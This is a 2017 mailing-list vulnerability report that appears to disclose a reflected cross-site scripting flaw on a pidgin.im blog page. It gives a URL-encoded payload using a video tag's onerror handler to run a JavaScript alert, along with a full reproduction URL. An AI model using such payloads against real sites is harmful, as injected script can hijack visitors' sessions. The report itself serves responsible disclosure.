Vulnerability Report
Vikash Chaudhary
vv130295 at gmail.com
Mon Oct 9 00:41:29 EDT 2017
Vulnerability Name: Cross site scripting
Vulnerable URL:
https://pidgin.im/~elb/blog/architecture.html
Vulnerable item: Path Fragment
Payload =
%22%3Cvideo%3E%3Csource%20onerror%3d%22javascript:alert(9578)%22%3E
How to Reproduce this issue
1. Visit this URL
https://pidgin.im/~elb/blog/architecture.html%22%3Cvideo%3E%3Csource%20onerror%3d%22javascript:alert(9578)%22%3E
POC: screenshot enclosed in attachment
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2017-10-09 at 10.07.08 AM.png
Type: image/png
Size: 250200 bytes
Desc: not available
URL: <https://pidgin.im/cgi-bin/mailman/private/security/attachments/20171009/670f8a57/attachment-0001.png>